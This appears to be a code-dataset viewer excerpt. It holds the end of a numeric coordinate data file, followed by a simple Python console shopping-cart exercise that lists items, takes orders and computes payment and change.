112 1 0.861501 0.152317 0.556695
1471 1 0.70161 0.188418 0.515638
63 1 0.647345 0.579481 0.991468
1702 1 0.749685 0.513385 0.514141
298 1 0.918573 0.253575 0.546418
1342 1 0.866755 0.389921 0.546661
1753 1 0.643724 0.396996 0.513186
1915 1 0.752362 0.368113 0.611798
913 1 0.66209 0.630608 0.560577
514 1 0.780623 0.560415 0.572489
1434 1 0.929761 0.550291 0.550842
546 1 0.793206 0.624318 0.546835
2036 1 0.825584 0.619786 0.565963
199 1 0.871954 0.715463 0.558221
520 1 0.928714 0.761069 0.507238
901 1 0.613606 0.898051 0.593222
1781 1 0.706214 0.959869 0.508238
1057 1 0.72349 0.0882146 0.644121
132 1 0.547504 0.16506 0.539686
1926 1 0.860795 0.158022 0.524568
1554 1 0.683847 0.367501 0.587765
1608 1 0.790019 0.38285 0.60197
1132 1 0.784592 0.568025 0.640008
577 1 0.715384 0.571591 0.572203
653 1 0.907623 0.566821 0.555178
1519 1 0.612968 0.567379 0.609982
382 1 0.637799 0.63757 0.601826
657 1 0.711398 0.649587 0.555077
842 1 0.545022 0.756417 0.534364
1726 1 0.520464 0.588066 0.899583
1441 1 0.895982 0.777866 0.562018
1420 1 0.792461 0.902841 0.552812
1549 1 0.553685 0.97334 0.56448
300 1 0.849079 0.992719 0.627513
1616 1 0.866066 0.980339 0.990952
1924 1 0.653809 0.188382 0.957378
808 1 0.726516 0.098248 0.649003
664 1 0.943395 0.641661 0.565182
752 1 0.683457 0.127031 0.628459
501 1 0.669605 0.146917 0.630343
1672 1 0.636022 0.564488 0.936214
219 1 0.671571 0.244271 0.561108
1605 1 0.872031 0.314118 0.625014
854 1 0.970702 0.364532 0.601223
1126 1 0.614142 0.407351 0.62006
1636 1 0.929942 0.362594 0.626147
1843 1 0.769042 0.468969 0.574689
146 1 0.737814 0.56165 0.614271
1153 1 0.733302 0.482468 0.609798
789 1 0.754163 0.555394 0.642873
1033 1 0.855942 0.696279 0.573754
780 1 0.693064 0.724063 0.590384
932 1 0.873214 0.761955 0.557433
1174 1 0.569363 0.75046 0.550649
428 1 0.640825 0.82803 0.550945
787 1 0.758695 0.899318 0.621719
741 1 0.831406 0.899045 0.614238
966 1 0.749166 0.0449118 0.624187
796 1 0.780529 0.0451076 0.667584
1909 1 0.942663 0.102593 0.57144
495 1 0.837264 0.127374 0.651604
521 1 0.673714 0.153248 0.603761
1118 1 0.503303 0.172502 0.639522
931 1 0.970055 0.288268 0.591214
678 1 0.805905 0.317958 0.606636
1298 1 0.904918 0.346259 0.635674
1021 1 0.938274 0.363649 0.535329
1617 1 0.903851 0.425179 0.645047
1522 1 0.556962 0.428054 0.601353
435 1 0.739246 0.47625 0.623798
426 1 0.730442 0.467821 0.621152
885 1 0.724802 0.541771 0.631723
1236 1 0.551445 0.60916 0.590737
1346 1 0.875449 0.614023 0.612732
98 1 0.8935 0.695805 0.611095
649 1 0.621431 0.688537 0.63318
892 1 0.695096 0.0778201 0.640514
2046 1 0.872194 0.0515215 0.623605
1023 1 0.831122 0.161074 0.641344
401 1 0.510383 0.136305 0.576063
656 1 0.824247 0.145852 0.669465
309 1 0.761534 0.248157 0.624666
644 1 0.897365 0.348062 0.629798
375 1 0.59335 0.401234 0.597349
1100 1 0.665452 0.40894 0.619242
432 1 0.685628 0.498373 0.689221
1125 1 0.57768 0.485207 0.622723
1821 1 0.713602 0.527169 0.589807
1508 1 0.687473 0.574959 0.635659
29 1 0.889874 0.635273 0.631014
1997 1 0.790389 0.603915 0.626269
314 1 0.546925 0.675539 0.586489
1661 1 0.870072 0.858506 0.645399
817 1 0.871036 0.827194 0.552353
1047 1 0.850722 0.837668 0.678055
573 1 0.589076 0.90379 0.674062
1910 1 0.68852 0.952295 0.61883
280 1 0.634218 0.00409895 0.675647
1032 1 0.571164 0.0887489 0.656752
762 1 0.521968 0.516918 0.674188
1208 1 0.996518 0.600753 0.802157
1492 1 0.618015 0.142648 0.611212
1539 1 0.566659 0.165277 0.632308
1317 1 0.777488 0.188019 0.65733
1114 1 0.523066 0.152566 0.649646
1217 1 0.889719 0.113599 0.669419
313 1 0.812513 0.238762 0.631413
673 1 0.729469 0.221876 0.671087
155 1 0.867679 0.265904 0.647626
1806 1 0.50181 0.325577 0.682369
1936 1 0.712948 0.308371 0.621205
2006 1 0.889546 0.429947 0.7148
878 1 0.828094 0.560327 0.620169
2026 1 0.733323 0.534705 0.636734
1497 1 0.992339 0.609594 0.697021
1300 1 0.911843 0.743602 0.633592
1528 1 0.702779 0.769626 0.599483
1658 1 0.750769 0.795539 0.682778
1660 1 0.804794 0.866703 0.625759
584 1 0.887494 0.784089 0.658199
919 1 0.916051 0.892287 0.715145
1312 1 0.581625 0.899553 0.680195
1221 1 0.62401 0.920825 0.604493
719 1 0.713861 0.950352 0.64858
1296 1 0.618095 0.942529 0.662705
229 1 0.635427 0.944694 0.634962
788 1 0.537314 0.0129435 0.678481
809 1 0.9636 0.991348 0.691522
781 1 0.915685 0.216727 0.681431
1244 1 0.510073 0.314272 0.721126
862 1 0.76097 0.27462 0.748627
683 1 0.966694 0.257141 0.666599
1107 1 0.673813 0.429366 0.711361
1310 1 0.694541 0.492745 0.676958
922 1 0.810175 0.63099 0.674041
1715 1 0.875437 0.666769 0.612724
1793 1 0.975016 0.70393 0.619307
544 1 0.737239 0.0720149 0.568575
81 1 0.734905 0.748838 0.688449
1314 1 0.922818 0.87896 0.699045
845 1 0.997288 0.0810783 0.682874
1861 1 0.734544 0.0165424 0.673736
907 1 0.75432 0.0956744 0.688786
1888 1 0.740381 0.223868 0.644809
1882 1 0.910338 0.350109 0.729092
1728 1 0.792286 0.356548 0.703693
1747 1 0.782362 0.211814 0.534438
1397 1 0.657045 0.505376 0.732828
948 1 0.889781 0.522019 0.67607
88 1 0.945604 0.621897 0.63355
1473 1 0.618938 0.711637 0.717189
606 1 0.990763 0.803218 0.683974
1513 1 0.930423 0.82622 0.607175
1526 1 0.586886 0.791 0.615581
205 1 0.573255 0.825856 0.6981
1176 1 0.83539 0.809589 0.677056
2027 1 0.521492 0.975945 0.708734
408 1 0.934349 0.947722 0.639744
1491 1 0.547686 0.0550814 0.745265
706 1 0.631125 0.0561219 0.70289
920 1 0.962975 0.067466 0.694095
821 1 0.567863 0.100069 0.670067
1648 1 0.797923 0.106108 0.729087
1137 1 0.546259 0.183698 0.741898
1358 1 0.676806 0.871694 0.931118
908 1 0.589078 0.172592 0.686961
1293 1 0.648849 0.243554 0.721595
35 1 0.624387 0.304782 0.687859
1315 1 0.764897 0.343605 0.7191
46 1 0.928442 0.391491 0.743343
1515 1 0.916517 0.427503 0.681429
1955 1 0.849012 0.536078 0.64509
738 1 0.954228 0.619341 0.725651
667 1 0.76226 0.725689 0.724865
239 1 0.575596 0.840934 0.688989
951 1 0.815343 0.957159 0.734506
79 1 0.935169 0.927298 0.666531
61 1 0.759686 0.957233 0.665359
1911 1 0.764074 0.137053 0.735165
650 1 0.852287 0.253252 0.739632
962 1 0.874253 0.29421 0.715076
1771 1 0.694244 0.27021 0.686047
1115 1 0.552135 0.35907 0.739375
1431 1 0.662825 0.326457 0.746592
32 1 0.817858 0.388571 0.649547
255 1 0.666525 0.50104 0.725461
1071 1 0.931726 0.473013 0.731763
1216 1 0.626735 0.570134 0.70441
766 1 0.620689 0.562714 0.695726
1939 1 0.882481 0.5433 0.762548
1226 1 0.854403 0.654982 0.733167
1352 1 0.889654 0.59992 0.765122
1030 1 0.589407 0.730246 0.715228
1964 1 0.693332 0.794724 0.726608
1783 1 0.594693 0.823958 0.756287
618 1 0.868206 0.908014 0.727599
968 1 0.757103 0.0808754 0.691914
135 1 0.594939 0.0257477 0.686217
1040 1 0.681716 0.0107344 0.757706
1398 1 0.596069 0.123462 0.739669
795 1 0.599201 0.118947 0.723189
1698 1 0.79797 0.18125 0.741931
1674 1 0.816357 0.145005 0.73983
1524 1 0.538204 0.252523 0.724987
1767 1 0.925101 0.252241 0.692144
206 1 0.818102 0.288035 0.70843
195 1 0.946583 0.322288 0.725634
1179 1 0.937919 0.219317 0.744493
1834 1 0.7758 0.515255 0.751401
1945 1 0.589058 0.465815 0.788097
587 1 0.853435 0.553823 0.751794
273 1 0.62862 0.615271 0.77797
1160 1 0.780963 0.681806 0.771228
1270 1 0.995872 0.654179 0.715429
1196 1 0.727895 0.787967 0.727778
450 1 0.657033 0.736324 0.642864
198 1 0.805189 0.871168 0.739
264 1 0.665006 0.795365 0.696809
359 1 0.606942 0.826871 0.693261
1119 1 0.745748 0.886567 0.724662
1394 1 0.544546 0.888377 0.743368
1717 1 0.835 0.0516107 0.757805
438 1 0.940646 0.167569 0.691399
427 1 0.990796 0.148424 0.753896
564 1 0.565257 0.243893 0.751472
1754 1 0.757785 0.484357 0.527341
1143 1 0.893081 0.276858 0.799106
418 1 0.614771 0.343919 0.763707
292 1 0.993175 0.522042 0.712129
1537 1 0.880965 0.567541 0.753198
1000 1 0.784397 0.553303 0.801177
139 1 0.617639 0.656657 0.774638
549 1 0.746763 0.719408 0.73641
1505 1 0.590482 0.698953 0.771212
814 1 0.693222 0.727684 0.785985
858 1 0.85043 0.662799 0.72901
1063 1 0.931223 0.693409 0.762989
1716 1 0.520352 0.281739 0.990454
1789 1 0.639555 0.814837 0.80004
1265 1 0.613714 0.787872 0.719654
1624 1 0.52088 0.888913 0.766024
1929 1 0.924483 0.976384 0.741031
391 1 0.770454 0.0451567 0.828768
317 1 0.868715 0.0718064 0.726058
66 1 0.563073 0.0620149 0.806663
596 1 0.727977 0.0590817 0.776188
228 1 0.941941 0.122389 0.762964
727 1 0.962267 0.0909027 0.770371
1656 1 0.794855 0.386045 0.798341
1316 1 0.595487 0.403301 0.770702
1742 1 0.679338 0.410785 0.739833
1942 1 0.782747 0.529599 0.791484
240 1 0.544215 0.651732 0.753094
1568 1 0.709517 0.587869 0.704703
103 1 0.676818 0.685579 0.772104
1980 1 0.827057 0.649964 0.792733
582 1 0.825757 0.76246 0.754928
1001 1 0.531236 0.770404 0.735935
119 1 0.563683 0.582337 0.918982
8 1 0.962823 0.1395 0.8065
114 1 0.622362 0.22266 0.786796
1263 1 0.520281 0.297822 0.807127
1108 1 0.572884 0.2696 0.800447
1829 1 0.954126 0.222951 0.742139
561 1 0.676452 0.275316 0.771928
729 1 0.868828 0.442417 0.757683
1589 1 0.976879 0.51482 0.536588
1140 1 0.945321 0.51754 0.774861
1854 1 0.686305 0.545552 0.799955
841 1 0.885077 0.641435 0.827737
486 1 0.677977 0.664539 0.778627
268 1 0.509515 0.695702 0.797444
1182 1 0.869058 0.727222 0.811796
568 1 0.653203 0.057602 0.534148
1830 1 0.627065 0.779662 0.806982
1162 1 0.527513 0.891222 0.828651
1719 1 0.533405 0.834455 0.755818
1219 1 0.745289 0.939475 0.796829
1602 1 0.707848 0.117627 0.803259
665 1 0.64328 0.128743 0.820938
1575 1 0.644582 0.234435 0.77264
305 1 0.764948 0.131905 0.800594
1344 1 0.558026 0.247429 0.84859
180 1 0.813077 0.139377 0.842521
1395 1 0.515838 0.255635 0.866461
939 1 0.948355 0.230975 0.796226
1606 1 0.802416 0.444237 0.765633
628 1 0.752582 0.424361 0.804845
986 1 0.753252 0.587354 0.819778
1483 1 0.82072 0.153101 0.522579
1967 1 0.620952 0.645007 0.792478
949 1 0.659212 0.676975 0.793914
1207 1 0.552897 0.773056 0.849893
1662 1 0.835006 0.894934 0.797844
1574 1 0.671703 0.0479921 0.874915
1022 1 0.721233 0.0803976 0.90589
320 1 0.660303 0.16754 0.827201
319 1 0.65007 0.214288 0.812759
1282 1 0.601041 0.246968 0.82271
770 1 0.777677 0.270565 0.822529
173 1 0.609994 0.312836 0.866715
23 1 0.911313 0.431571 0.866649
1053 1 0.666355 0.501054 0.828224
67 1 0.947996 0.574677 0.791375
1136 1 0.998648 0.551542 0.795104
700 1 0.745986 0.545448 0.822688
975 1 0.89019 0.514375 0.851312
676 1 0.784426 0.5317 0.815478
1808 1 0.640409 0.585391 0.800445
404 1 0.990802 0.0549665 0.504097
1873 1 0.531403 0.643218 0.677914
202 1 0.574158 0.925963 0.853252
1147 1 0.661157 0.876267 0.76861
1916 1 0.831277 0.0559096 0.854766
151 1 0.516486 0.0708936 0.863624
630 1 0.952213 0.0830834 0.78777
18 1 0.744285 0.14964 0.776234
565 1 0.651539 0.12487 0.872208
607 1 0.55897 0.241951 0.777335
1974 1 0.677558 0.206183 0.860939
73 1 0.602562 0.230343 0.847867
251 1 0.945689 0.330218 0.821254
170 1 0.892234 0.454047 0.881913
1105 1 0.636051 0.5611 0.826167
397 1 0.573141 0.68159 0.866409
209 1 0.533229 0.706786 0.827881
232 1 0.773914 0.866571 0.839007
60 1 0.586091 0.951832 0.825832
1782 1 0.802018 0.918458 0.887459
1743 1 0.987151 0.933847 0.803285
1944 1 0.810887 0.130692 0.908927
1941 1 0.889685 0.0319245 0.771118
1546 1 0.969684 0.143778 0.865739
1541 1 0.510516 0.241026 0.885822
1165 1 0.524682 0.244261 0.851299
1350 1 0.96861 0.234668 0.869523
773 1 0.726817 0.401119 0.863744
1076 1 0.594698 0.593835 0.857389
2005 1 0.763391 0.855088 0.987759
848 1 0.800839 0.62266 0.818047
1038 1 0.504289 0.618449 0.858369
1680 1 0.687064 0.690797 0.902382
245 1 0.837617 0.778079 0.770522
1381 1 0.731009 0.742975 0.915454
142 1 0.673522 0.807165 0.866608
1487 1 0.87643 0.92182 0.872337
502 1 0.905288 0.031624 0.91125
1550 1 0.71701 0.0744649 0.880532
1596 1 0.807038 0.207257 0.86496
1590 1 0.795652 0.182581 0.866261
1422 1 0.902558 0.223263 0.876488
405 1 0.582033 0.234813 0.880245
1700 1 0.914382 0.267909 0.888604
1479 1 0.891733 0.227093 0.965621
2018 1 0.905986 0.287123 0.884084
306 1 0.760997 0.330991 0.882609
1984 1 0.878504 0.303534 0.92606
1306 1 0.646276 0.478328 0.925419
1391 1 0.958093 0.407206 0.902618
357 1 0.581713 0.391619 0.805801
703 1 0.574133 0.536349 0.92811
1547 1 0.651836 0.525595 0.830795
492 1 0.652885 0.556186 0.919135
22 1 0.742619 0.548216 0.959628
1194 1 0.940306 0.772734 0.867849
21 1 0.69155 0.833948 0.885087
11 1 0.728997 0.914222 0.95154
603 1 0.758855 0.88109 0.871605
1649 1 0.98068 0.852228 0.852147
1172 1 0.990291 0.967307 0.928801
768 1 0.920327 0.911034 0.89713
1628 1 0.624486 0.978583 0.857453
585 1 0.984328 0.0817576 0.958223
1007 1 0.614372 0.111055 0.902646
1975 1 0.664748 0.226747 0.906817
1201 1 0.778264 0.247005 0.97486
1343 1 0.613945 0.259422 0.880461
1906 1 0.71771 0.311955 0.924057
1150 1 0.634368 0.339378 0.893955
158 1 0.703063 0.303776 0.837592
1527 1 0.600684 0.369772 0.868407
1918 1 0.709285 0.440186 0.939403
340 1 0.532564 0.454517 0.528554
925 1 0.676134 0.402566 0.94711
1416 1 0.67506 0.478914 0.981797
1601 1 0.944783 0.531387 0.850385
1504 1 0.691467 0.263872 0.981528
108 1 0.609437 0.567747 0.970404
1678 1 0.843488 0.51142 0.865005
1103 1 0.674542 0.800863 0.890069
1960 1 0.620137 0.818178 0.878693
1404 1 0.517453 0.45558 0.888273
743 1 0.599724 0.812825 0.973228
800 1 0.907972 0.954765 0.900077
1223 1 0.575951 0.624102 0.83259
12 1 0.644726 0.979554 0.977257
1304 1 0.615011 0.118626 0.975825
1260 1 0.664698 0.122859 0.829224
1415 1 0.639956 0.215639 0.907977
1439 1 0.695746 0.262165 0.892071
1129 1 0.848699 0.271958 0.901929
926 1 0.922775 0.447415 0.947135
1735 1 0.98311 0.444009 0.975046
1872 1 0.900462 0.501493 0.897579
685 1 0.905033 0.524133 0.862964
509 1 0.594448 0.647053 0.92713
430 1 0.730495 0.696288 0.987789
1510 1 0.9368 0.832487 0.923203
420 1 0.723106 0.0761159 0.958462
1799 1 0.678268 0.0657934 0.945712
1364 1 0.524466 0.929549 0.538999
748 1 0.98377 0.0410642 0.519615
756 1 0.969646 0.407957 0.916159
1563 1 0.747272 0.466864 0.867997
627 1 0.578428 0.559867 0.929814
1377 1 0.513923 0.671348 0.573124
1116 1 0.660039 0.753321 0.955061
1017 1 0.862617 0.77814 0.993498
1885 1 0.785337 0.723419 0.971125
1642 1 0.721527 0.871403 0.881306
1123 1 0.919869 0.946273 0.910223
1341 1 0.729259 0.994477 0.940643
1251 1 0.761023 0.00844777 0.953083
1469 1 0.625171 0.0177851 0.905696
1374 1 0.65301 0.972755 0.894678
344 1 0.908611 0.993483 0.905715
1054 1 0.789189 0.0448468 0.936368
188 1 0.857765 0.368884 0.997119
905 1 0.633737 0.257773 0.944738
850 1 0.865386 0.343432 0.944883
1494 1 0.810607 0.0907112 0.53925
1481 1 0.577148 0.41765 0.936536
1640 1 0.693046 0.568307 0.984524
1837 1 0.810813 0.775654 0.935934
981 1 0.645362 0.840996 0.978764
613 1 0.780728 0.816927 0.938518
992 1 0.633318 0.862345 0.9777
2024 1 0.943644 0.921086 0.962065
1565 1 0.631843 0.926264 0.94703
988 1 0.954582 0.984721 0.998128
47 1 0.889369 0.12628 0.970192
1577 1 0.513813 0.73858 0.784687
1357 1 0.86055 0.266635 0.520665
1516 1 0.599158 0.43241 0.962874
1203 1 0.857405 0.071525 0.553813
2012 1 0.550498 0.582884 0.958181
2008 1 0.683871 0.6421 0.892411
1738 1 0.94163 0.600728 0.971731
2031 1 0.962973 0.793693 0.523848
963 1 0.961967 0.769983 0.840227
221 1 0.910273 0.704043 0.951389
1231 1 0.508117 0.223138 0.523556
645 1 0.513723 0.174837 0.680027
1762 1 0.514292 0.18984 0.728028
231 1 0.564178 0.225865 0.966276
30 1 0.904538 0.378598 0.984758
1655 1 0.657062 0.616086 0.985989
1632 1 0.663632 0.489485 0.905735
2048 1 0.957174 0.239645 0.66781
1488 1 0.571994 0.559881 0.507978
191 1 0.501579 0.12709 0.594191
1024 1 0.500986 0.0484354 0.852249
162 1 0.924271 0.440687 0.998262
873 1 0.99976 0.31244 0.745407
| [
"scheuclu@gmail.com"
] | scheuclu@gmail.com |
75ceb6fdf8315b35a20773ebbf24f3381cb9ae67 | 1e4aef2d451a97a8aafb4e1cddfa4ebb0cc309cc | /first_step/shopping_cart/shopping_cart.py | 7665887eb831ea8e6b30c1d9609e1458235dfea7 | [] | no_license | FleeaniCh/python | 4c40b5d9d711796cee49a7b95bb7f64fa9257662 | 129a759212a8221de1a3d9c1cb3b66c6fece5a63 | refs/heads/master | 2023-03-12T06:40:05.120123 | 2021-02-28T02:03:34 | 2021-02-28T02:03:34 | 342,999,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,263 | py | dict_commodity_info = {
101: {"name": "屠龙刀", "price": 10000},
102: {"name": "倚天剑", "price": 10000},
103: {"name": "九阴白骨爪", "price": 8000},
104: {"name": "九阳神功", "price": 9000},
105: {"name": "降龙十八掌", "price": 8000},
106: {"name": "乾坤大挪移", "price": 10000}
}
list_order = []
def select_menu():
    """Top-level shopping loop: dispatch the user's menu choice forever.

    "1" starts a purchase, "2" starts checkout; any other input re-prompts.
    """
    # Map menu keys to their handlers; unknown keys fall through and re-prompt.
    actions = {"1": buying, "2": settlement}
    while True:
        choice = input("1键购买,2键结算。")
        handler = actions.get(choice)
        if handler is not None:
            handler()
def settlement():
    """Check out: total up the current cart, then collect payment for it."""
    paying(calculate_total_price())
def paying(total_price):
    """Prompt repeatedly for payment until the amount entered covers the bill.

    :param total_price: amount due for the current order
    """
    while True:
        paid = float(input("总价%d元,请输入金额:" % total_price))
        if paid < total_price:
            # Not enough money — tell the user and ask again.
            print("金额不足.")
            continue
        # Payment accepted: report the change and empty the cart.
        print("购买成功,找回:%d元。" % (paid - total_price))
        list_order.clear()
        return
def calculate_total_price():
    """Print every line item in the cart and return the grand total.

    :return: sum of unit price * quantity over all orders in list_order
    """
    total = 0
    for entry in list_order:
        item = dict_commodity_info[entry["cid"]]
        price, count = item["price"], entry["count"]
        print("商品:%s,单价:%d,数量:%d." % (item["name"], price, count))
        total += price * count
    return total
def buying():
    """Run one purchase interaction: show the catalogue, record an order, confirm."""
    for step in (print_commodity_info, create_order):
        step()
    print("添加到购物车。")
def create_order():
    """Build one order line (commodity id + quantity) and append it to the cart."""
    chosen_id = input_commodity_id()
    quantity = int(input("请输入购买数量:"))
    list_order.append({"cid": chosen_id, "count": quantity})
def input_commodity_id():
    """Keep prompting until the user enters a known commodity id.

    :return: an id that exists as a key in dict_commodity_info
    """
    while True:
        code = int(input("请输入商品编号:"))
        if code in dict_commodity_info:
            return code
        print("该商品不存在")
def print_commodity_info():
    """List every commodity on sale: id, name and unit price."""
    for code, details in dict_commodity_info.items():
        line = "编号:%d,名称:%s,单价:%d。" % (code, details["name"], details["price"])
        print(line)
select_menu()
| [
"17354108830@163.com"
] | 17354108830@163.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.